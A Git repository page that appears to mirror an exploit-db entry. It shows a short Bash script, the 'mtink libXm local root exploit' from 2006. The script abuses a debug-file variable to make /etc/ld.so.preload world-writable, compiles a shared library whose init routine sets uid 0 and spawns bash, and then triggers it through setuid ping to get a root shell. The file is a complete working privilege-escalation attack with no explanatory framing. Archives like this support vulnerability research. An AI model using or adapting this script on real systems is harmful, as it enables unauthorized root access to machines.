bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/2144.sh
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

26 lines
No EOL
527 B
Bash
Executable file
Raw Blame History

#!/bin/sh
echo
echo "mtink libXm local root exploit"
echo "* karol@wiesek.pl *"
echo
umask 000
export DEBUG_FILE="/etc/ld.so.preload"
cat > /tmp/lib.c << _EOF
#include <unistd.h>
void _init(void)
{
if (getuid()!=0 && geteuid()==0)
{
setuid(0);
unlink("/etc/ld.so.preload");
execl("/bin/bash", "bash", 0);
}
}
_EOF
/usr/bin/gcc -o /tmp/lib.o -c /tmp/lib.c
/usr/bin/ld -shared -o /tmp/lib.so /tmp/lib.o
/usr/bin/mtink
echo "/tmp/lib.so" > /etc/ld.so.preload
/bin/ping
# milw0rm.com [2006-08-08]
Reference in a new issue View git blame Copy permalink